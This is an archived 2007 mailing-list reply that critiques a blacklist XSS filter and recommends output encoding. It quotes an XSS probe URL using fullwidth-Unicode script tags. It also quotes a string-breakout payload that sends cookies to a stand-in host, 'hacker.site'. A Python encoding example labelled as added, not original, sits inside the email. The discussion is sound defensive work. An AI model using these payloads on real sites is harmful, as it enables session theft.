[WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
- From: celf <celf@xxxxxxxxx>
- Subject: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
- Date: Tue, 23 Jan 2007 10:25:14 -0600
Hello,
The main problem I see with it is that it could corrupt your data. There
may be cases when you actually need those characters to be stored. Take
for example, mathematics. It's not uncommon for greater-than, etc.,
symbols to be used. Input validation as a means to make output safe does
not work, at least not for very long. The simple approach to protecting
against XSS is to encode it properly for the output layer.
I maintain that the best way to do this is to format output characters
into their appropriate HTML entities (JavaScript output
notwithstanding). So, < becomes &lt; or &#60;. In fact, I've a page that
does no input validation at all, but transforms every output character
NOT A-Z0-9 into an HTML entity. This works even for multi-byte characters.
Second, your filtering approach is the standard "blacklist" approach,
and while it may be fine for most things, there will be circumstances when
it won't. Take for example:
http://www.attacklabs.com/xssfilter/filter?html=%uff1cscript%uff1ealert('xss')%uff1c/script%uff1e&B1=Submit
On your site, this simple attack does not work. However, there is a
known vulnerability in .NET <= 1.1 that does allow this script to
execute. Note that I didn't try very hard, someone else YMMV.
http://lists.seifried.org/pipermail/security/2005-February/007054.html
Finally, your filter won't work for dynamic parameters being written into
JavaScript (which I see all the time as an XSS vector), e.g.,
code:
response.write("<script>x='"&<%=server_side_var%>&"';alert(x);</script>")
exploit (sending this as the server side param value):
a'; document.location='hacker.site?cookies='+document.cookies;var y='a
So, your approach works, it's just tough to maintain when new exploits
come out or when not applied to a very specific case. Admittedly, my
approach isn't complete here either, but I'm sure others have more to add.
-c
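The two output contexts contrasted above (plain HTML output versus a parameter written into a JavaScript string literal) as an added example; this is my own code, not code from the thread or from XSSFilter.java, and its function names and sample input are assumptions:

```python
# Added example (not code from the thread or from XSSFilter.java): output
# encoding that follows the rule above of encoding EVERY character that is
# not A-Z, a-z or 0-9, once for HTML and once for a JavaScript string literal.
# Function names and the sample input are constructed for this example.

def html_encode_all(text: str) -> str:
    """HTML body or attribute context: each non-alphanumeric code point becomes
    a decimal character reference, e.g. '<' -> '&#60;'. Working on code points
    rather than bytes is what keeps multi-byte characters intact."""
    return "".join(
        ch if (ch.isascii() and ch.isalnum()) else f"&#{ord(ch)};" for ch in text
    )

def js_string_encode(text: str) -> str:
    """JavaScript string-literal context (text placed between quotes inside a
    <script> block). Browsers do not decode HTML entities inside <script>, so
    '&#39;' would merely corrupt the data; \\uXXXX escapes are decoded by the
    JS parser instead. Code points above U+FFFF become a surrogate pair."""
    out = []
    for ch in text:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp > 0xFFFF:
            cp -= 0x10000
            out.append(f"\\u{0xD800 + (cp >> 10):04x}\\u{0xDC00 + (cp & 0x3FF):04x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)

PREFIX, SUFFIX = "<script>x='", "';alert(x);</script>"

def render_script(server_side_var: str) -> str:
    """The thread's x='<param>' pattern, fixed by encoding for the JS string
    context before interpolation instead of blacklisting characters."""
    return PREFIX + js_string_encode(server_side_var) + SUFFIX

def breaks_out(rendered: str) -> bool:
    """Defensive check on the rendered tag: any quote, '<' or raw backslash left
    between the two delimiters would let the parameter leave the string or
    terminate the script element early."""
    body = rendered[len(PREFIX):-len(SUFFIX)]
    return any(c in body for c in "'<") or "\\" in body.replace("\\u", "")

if __name__ == "__main__":
    # Constructed input shaped like the string-breakout payload quoted above.
    sample = "a'; alert(1); var y='a"
    print(html_encode_all("2 < 3 é"))   # 2&#32;&#60;&#32;3&#32;&#233;
    print(render_script(sample), breaks_out(render_script(sample)))  # ... False
```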
anurag.agarwal@xxxxxxxxx wrote:
> The source code is uploaded to the page. You can either view it
> at http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html or
> download the java file at http://www.attacklabs.com/xssfilter/XSSFilter.java
>
> Cheers,
>
> Anurag Agarwal
>
> SEEC - An application security search engine <http://www.myappsecurity.com/>
> Web: www.attacklabs.com, www.myappsecurity.com
> Email : anurag.agarwal@xxxxxxxxx
> Blog : http://myappsecurity.blogspot.com
>
> ----- Original Message ----
> From: Amit Klein <aksecurity@xxxxxxxxx>
> To: Anurag Agarwal <anurag.agarwal@xxxxxxxxx>
> Cc: WASC Forum <websecurity@xxxxxxxxxxxxx>; "webappsec @OWASP"
> <webappsec@xxxxxxxxxxxxxxx>
> Sent: Monday, January 22, 2007 11:50:06 PM
> Subject: Re: [Webappsec] xss filter to protect from xss attacks
>
> Anurag Agarwal wrote:
>> I have created an XSS filter to protect from XSS attacks. Though I have
>> filtered only for 8 characters, I was able to test against all the
>> attacks mentioned in RSnake's cheat sheet. AppScan was not able to
>> detect any XSS attacks on it. I request the application security
>> community to help test this filter. 90% I am sure that you won't be
>> able to perform any XSS attack on it; the rest 10% I will find out
>> after the feedback from the community. For the curious mind, it is
>> written in Java.
> If this is an open source project - then where is the source code? If
> it's not - then why should we bother testing it?
----------------------------------------------------------------------------
The Web Security Mailing List:
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Brought to you by http://www.webappsec.org